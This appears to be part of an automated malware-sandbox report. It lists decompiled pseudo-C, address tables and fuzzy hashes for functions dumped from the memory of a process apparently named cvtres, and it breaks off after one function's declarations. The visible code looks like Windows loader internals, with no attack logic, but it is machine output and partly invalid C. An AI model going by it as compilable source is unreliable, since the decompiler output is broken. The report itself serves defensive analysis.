                                                                        0x05609b81
                                                                        0x05609b85
                                                                        0x05609b89
                                                                        0x05609ba7
                                                                        0x05609b8b
                                                                        0x05609b91
                                                                        0x05609b9a
                                                                        0x05609b9f
                                                                        0x05609b9f
                                                                        0x055b8788
                                                                        0x055b878d
                                                                        0x055b8763
                                                                        0x055b8763
                                                                        0x055b8766
                                                                        0x00000000
                                                                        0x055b8766
                                                                        0x05609b70
                                                                        0x00000000
                                                                        0x05609b70
                                                                        0x055b8656
                                                                        0x055b865a
                                                                        0x055b865c
                                                                        0x055b8752
                                                                        0x055b8756
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055b875e
                                                                        0x00000000
                                                                        0x055b875e
                                                                        0x055b8662
                                                                        0x055b8662
                                                                        0x055b8662
                                                                        0x055b8666
                                                                        0x00000000
                                                                        0x055b8666
                                                                        0x055b85b7
                                                                        0x055b85b9
                                                                        0x055b85bc
                                                                        0x055b85bf
                                                                        0x055b85cc
                                                                        0x055b85d1
                                                                        0x055b85d4
                                                                        0x055b85db
                                                                        0x055b85de
                                                                        0x055b85e0
                                                                        0x05609b5f
                                                                        0x00000000
                                                                        0x05609b5f
                                                                        0x055b85e6
                                                                        0x055b85ea
                                                                        0x055b86c3
                                                                        0x055b86c5
                                                                        0x055b86c8
                                                                        0x055b86ca
                                                                        0x05609b16
                                                                        0x00000000
                                                                        0x05609b16
                                                                        0x055b86d6
                                                                        0x055b85f6
                                                                        0x055b85f6
                                                                        0x055b85f9
                                                                        0x055b8602
                                                                        0x055b8606
                                                                        0x055b860a
                                                                        0x055b860b
                                                                        0x055b860e
                                                                        0x055b8611
                                                                        0x00000000
                                                                        0x055b8611
                                                                        0x055b85f3
                                                                        0x00000000
                                                                        0x055b85f3
                                                                        0x055b8619
                                                                        0x055b861e
                                                                        0x055b861e
                                                                        0x055b8621
                                                                        0x055b8622
                                                                        0x055b8623
                                                                        0x055b8625
                                                                        0x055b862c
                                                                        0x00000000
                                                                        0x055b873d
                                                                        0x00000000
                                                                        0x055b873d
                                                                        0x055b8737
                                                                        0x055b850f
                                                                        0x055b8512
                                                                        0x00000000
                                                                        0x055b8512
                                                                        0x00000000
                                                                        0x055b84d6

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d288cd9989df65176ab6fa4c2510104b1f6a9b6447becc29d968f161da7de705
                                                                        • Instruction ID: 4ea76cd1ec2e0fa22c4510b61b13333714ccab0d9c92a7757a9bc916c0d79c54
                                                                        • Opcode Fuzzy Hash: d288cd9989df65176ab6fa4c2510104b1f6a9b6447becc29d968f161da7de705
                                                                        • Instruction Fuzzy Hash: 8FB17074E14209DFDB19DFD8C988AEEBBBAFF89304F105119E405AB345DBB0A941CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D513A Relevance: .3, Instructions: 258COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E055D513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x569d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E055ED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E055C2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L055C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E055EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E055BFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x569b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E055EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                        0x055d5142
                                                                        0x055d514c
                                                                        0x055d5150
                                                                        0x055d5157
                                                                        0x055d5159
                                                                        0x055d515e
                                                                        0x055d5165
                                                                        0x055d5169
                                                                        0x055d516c
                                                                        0x055d5172
                                                                        0x055d5176
                                                                        0x055d517a
                                                                        0x055d517a
                                                                        0x055d517a
                                                                        0x055d517f
                                                                        0x05616d8b
                                                                        0x05616d8e
                                                                        0x05616d91
                                                                        0x05616d95
                                                                        0x05616d98
                                                                        0x05616d9c
                                                                        0x05616da0
                                                                        0x05616da3
                                                                        0x05616da7
                                                                        0x05616e26
                                                                        0x05616e26
                                                                        0x05616e2a
                                                                        0x055d51f9
                                                                        0x055d51f9
                                                                        0x055d51fe
                                                                        0x05616e33
                                                                        0x05616e33
                                                                        0x05616e39
                                                                        0x05616e3d
                                                                        0x05616e46
                                                                        0x05616e50
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616e52
                                                                        0x05616e53
                                                                        0x05616e56
                                                                        0x05616e5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616e5f
                                                                        0x05616e67
                                                                        0x05616e77
                                                                        0x05616e7f
                                                                        0x05616e80
                                                                        0x05616e88
                                                                        0x05616e90
                                                                        0x05616e9f
                                                                        0x05616ea5
                                                                        0x05616ea9
                                                                        0x05616eb1
                                                                        0x05616ebf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616ecf
                                                                        0x05616ed3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616edb
                                                                        0x05616ede
                                                                        0x05616ee1
                                                                        0x05616ee8
                                                                        0x05616eeb
                                                                        0x05616eed
                                                                        0x05616ef0
                                                                        0x05616ef4
                                                                        0x05616ef8
                                                                        0x05616efc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616f0d
                                                                        0x05616f11
                                                                        0x05616f32
                                                                        0x05616f37
                                                                        0x05616f3b
                                                                        0x05616f3e
                                                                        0x05616f41
                                                                        0x05616f46
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05616f4c
                                                                        0x05616f50
                                                                        0x05616f50
                                                                        0x05616f54
                                                                        0x05616f62
                                                                        0x05616f65
                                                                        0x05616f6d
                                                                        0x05616f7b
                                                                        0x05616f7b
                                                                        0x05616f93
                                                                        0x05616f98
                                                                        0x05616fa0
                                                                        0x05616fa6
                                                                        0x05616fb3
                                                                        0x05616fb6
                                                                        0x05616fbf
                                                                        0x05616fc1
                                                                        0x05616fd5
                                                                        0x05616fda
                                                                        0x05616fda
                                                                        0x05616fdd
                                                                        0x05616fe2
                                                                        0x05616fe7
                                                                        0x05616feb
                                                                        0x05616fef
                                                                        0x05616ff3
                                                                        0x055d520c
                                                                        0x055d520c
                                                                        0x055d520f
                                                                        0x055d5215
                                                                        0x055d5234
                                                                        0x055d523a
                                                                        0x055d523a
                                                                        0x055d5244
                                                                        0x055d5245
                                                                        0x055d5246
                                                                        0x055d5251
                                                                        0x055d5251
                                                                        0x05616f13
                                                                        0x05616f17
                                                                        0x05616f17
                                                                        0x05616f18
                                                                        0x05616f1b
                                                                        0x05616f1f
                                                                        0x05616f23
                                                                        0x00000000
                                                                        0x05616f28
                                                                        0x055d5204
                                                                        0x055d5204
                                                                        0x055d5208
                                                                        0x00000000
                                                                        0x055d5208
                                                                        0x055d5185
                                                                        0x055d5188
                                                                        0x055d518a
                                                                        0x055d518e
                                                                        0x055d5195
                                                                        0x05616db1
                                                                        0x05616db5
                                                                        0x05616db9
                                                                        0x055d519b
                                                                        0x055d519b
                                                                        0x055d519e
                                                                        0x055d51a7
                                                                        0x055d51a9
                                                                        0x055d51a9
                                                                        0x055d51b5
                                                                        0x055d51b8
                                                                        0x055d51bb
                                                                        0x055d51be
                                                                        0x055d51c1
                                                                        0x055d51c5
                                                                        0x055d51c9
                                                                        0x055d51cd
                                                                        0x055d51cd
                                                                        0x055d51d8
                                                                        0x055d51dc
                                                                        0x055d51e0
                                                                        0x05616dcc
                                                                        0x05616dd0
                                                                        0x05616dd5
                                                                        0x05616ddd
                                                                        0x05616de1
                                                                        0x05616de1
                                                                        0x05616de5
                                                                        0x05616deb
                                                                        0x05616df1
                                                                        0x05616df7
                                                                        0x05616dfd
                                                                        0x05616e01
                                                                        0x05616e05
                                                                        0x05616e09
                                                                        0x05616e0d
                                                                        0x05616e11
                                                                        0x05616e11
                                                                        0x055d51eb
                                                                        0x05616e1a
                                                                        0x05616e1f
                                                                        0x05616e21
                                                                        0x05616e23
                                                                        0x00000000
                                                                        0x055d51f1
                                                                        0x055d51f1
                                                                        0x00000000
                                                                        0x055d51f1

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4004a004459bf80888846d30312837d38d966523d71f8d2d08100e4166510a9
                                                                        • Instruction ID: 28dea5305fcd4a7a13ef3f855ab16e3b151b7d40eb2802d715b2899f456901e2
                                                                        • Opcode Fuzzy Hash: b4004a004459bf80888846d30312837d38d966523d71f8d2d08100e4166510a9
                                                                        • Instruction Fuzzy Hash: BAC143756083818FD354CF68C480A6AFBF1BF88304F184A6EF89A8B752D770E845CB56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D03E2 Relevance: .3, Instructions: 254COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E055D03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x569d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E055D0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E055EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E055BB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x5697c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E055C7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E055C7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05627016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E055E9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E056269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x5697c04 != 0) {
						_t118 = _v12;
						_t120 = E0562A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x5697bd8;
						if( *0x5697bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E055E95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E055E99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05623540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E055AB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E055EAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x5698474 - 3;
										if( *0x5698474 != 3) {
											 *0x56979dc =  *0x56979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E055C7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E055C7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05627016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x5698708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x5697b00; // 0x0
							asm("ror esi, cl");
							 *0x569b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E055E95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E055B7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                        0x055d03f1
                                                                        0x055d03f7
                                                                        0x055d03f9
                                                                        0x055d03fb
                                                                        0x055d03fd
                                                                        0x055d0400
                                                                        0x055d040a
                                                                        0x05614c7a
                                                                        0x055d0537
                                                                        0x055d0547
                                                                        0x055d0410
                                                                        0x055d0410
                                                                        0x055d0414
                                                                        0x055d0417
                                                                        0x055d041a
                                                                        0x055d0421
                                                                        0x055d0424
                                                                        0x055d042b
                                                                        0x055d043b
                                                                        0x055d043e
                                                                        0x055d043f
                                                                        0x055d043f
                                                                        0x055d0446
                                                                        0x055d0449
                                                                        0x055d044c
                                                                        0x055d044f
                                                                        0x055d0459
                                                                        0x05614c8d
                                                                        0x055d045f
                                                                        0x055d045f
                                                                        0x055d045f
                                                                        0x055d0467
                                                                        0x05614c97
                                                                        0x05614c9d
                                                                        0x05614ca4
                                                                        0x05614caa
                                                                        0x05614caf
                                                                        0x05614cb1
                                                                        0x05614cc3
                                                                        0x05614cb3
                                                                        0x05614cbc
                                                                        0x05614cbc
                                                                        0x05614cc8
                                                                        0x05614ccb
                                                                        0x05614cd7
                                                                        0x05614cda
                                                                        0x05614cdf
                                                                        0x05614cdf
                                                                        0x05614ccb
                                                                        0x05614ca4
                                                                        0x055d046d
                                                                        0x055d046f
                                                                        0x055d046f
                                                                        0x055d0471
                                                                        0x055d0476
                                                                        0x055d047a
                                                                        0x055d047b
                                                                        0x055d0483
                                                                        0x055d0489
                                                                        0x055d048d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614ce9
                                                                        0x05614cef
                                                                        0x05614d22
                                                                        0x05614d22
                                                                        0x00000000
                                                                        0x05614d22
                                                                        0x05614cf1
                                                                        0x05614cf7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614cf9
                                                                        0x05614cff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614d05
                                                                        0x05614d07
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614d0d
                                                                        0x05614d0f
                                                                        0x05614d14
                                                                        0x05614d16
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614d1c
                                                                        0x05614d1c
                                                                        0x055d0499
                                                                        0x055d0535
                                                                        0x055d0535
                                                                        0x00000000
                                                                        0x055d0535
                                                                        0x055d04a6
                                                                        0x05614d2c
                                                                        0x05614d37
                                                                        0x05614d39
                                                                        0x05614d3b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614d41
                                                                        0x05614d48
                                                                        0x055d0527
                                                                        0x055d052b
                                                                        0x055d052d
                                                                        0x055d0530
                                                                        0x055d0530
                                                                        0x00000000
                                                                        0x055d052b
                                                                        0x05614d4e
                                                                        0x055d04ac
                                                                        0x055d04ac
                                                                        0x055d04af
                                                                        0x055d04b2
                                                                        0x055d04b7
                                                                        0x055d04b9
                                                                        0x055d04bb
                                                                        0x055d04bd
                                                                        0x055d04bf
                                                                        0x055d04c5
                                                                        0x055d04c9
                                                                        0x05614d53
                                                                        0x05614d59
                                                                        0x05614db9
                                                                        0x05614dba
                                                                        0x05614dbf
                                                                        0x05614dc2
                                                                        0x05614dc4
                                                                        0x05614dc7
                                                                        0x05614dce
                                                                        0x00000000
                                                                        0x05614dce
                                                                        0x05614d5b
                                                                        0x05614d61
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614d63
                                                                        0x05614d69
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614d6b
                                                                        0x05614d6e
                                                                        0x05614d74
                                                                        0x05614d76
                                                                        0x05614d7c
                                                                        0x05614d7e
                                                                        0x05614d84
                                                                        0x05614d89
                                                                        0x05614d8c
                                                                        0x05614d8d
                                                                        0x05614d92
                                                                        0x05614d95
                                                                        0x05614d96
                                                                        0x05614d98
                                                                        0x05614d9a
                                                                        0x05614d9f
                                                                        0x05614da4
                                                                        0x05614da6
                                                                        0x05614da8
                                                                        0x05614daf
                                                                        0x05614db1
                                                                        0x05614db1
                                                                        0x05614daf
                                                                        0x05614da6
                                                                        0x05614d84
                                                                        0x05614d7c
                                                                        0x00000000
                                                                        0x05614d74
                                                                        0x055d04d6
                                                                        0x05614de1
                                                                        0x055d04dc
                                                                        0x055d04dc
                                                                        0x055d04dc
                                                                        0x055d04e4
                                                                        0x05614deb
                                                                        0x05614df1
                                                                        0x05614df8
                                                                        0x05614dfe
                                                                        0x05614e03
                                                                        0x05614e05
                                                                        0x05614e17
                                                                        0x05614e07
                                                                        0x05614e10
                                                                        0x05614e10
                                                                        0x05614e1c
                                                                        0x05614e1f
                                                                        0x05614e35
                                                                        0x05614e35
                                                                        0x05614e1f
                                                                        0x05614df8
                                                                        0x055d04f1
                                                                        0x055d04fa
                                                                        0x05614e3f
                                                                        0x05614e47
                                                                        0x05614e5b
                                                                        0x05614e61
                                                                        0x05614e67
                                                                        0x05614e69
                                                                        0x05614e71
                                                                        0x05614e73
                                                                        0x055d0500
                                                                        0x055d0500
                                                                        0x055d0500
                                                                        0x055d04fa
                                                                        0x055d0508
                                                                        0x055d051d
                                                                        0x055d051d
                                                                        0x055d051f
                                                                        0x055d0524
                                                                        0x00000000
                                                                        0x055d0524
                                                                        0x055d0515
                                                                        0x055d0517
                                                                        0x05614e7a
                                                                        0x05614e7c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05614e85
                                                                        0x00000000
                                                                        0x05614e85
                                                                        0x00000000
                                                                        0x055d0517

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00d3982326952c3a29962e8dcbe5487b97346043031aebfbd4fc5c52950eed15
                                                                        • Instruction ID: 151ef2401e2e3346f70d561d4f1c4d7fbb472cc6bdddf0654197c9887dbf4488
                                                                        • Opcode Fuzzy Hash: 00d3982326952c3a29962e8dcbe5487b97346043031aebfbd4fc5c52950eed15
                                                                        • Instruction Fuzzy Hash: 14912332E04219AFDF31DA68C848FBDBBA5FB01765F090265ED11AB2E0EB749C00C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AC600 Relevance: .2, Instructions: 225COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E055AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
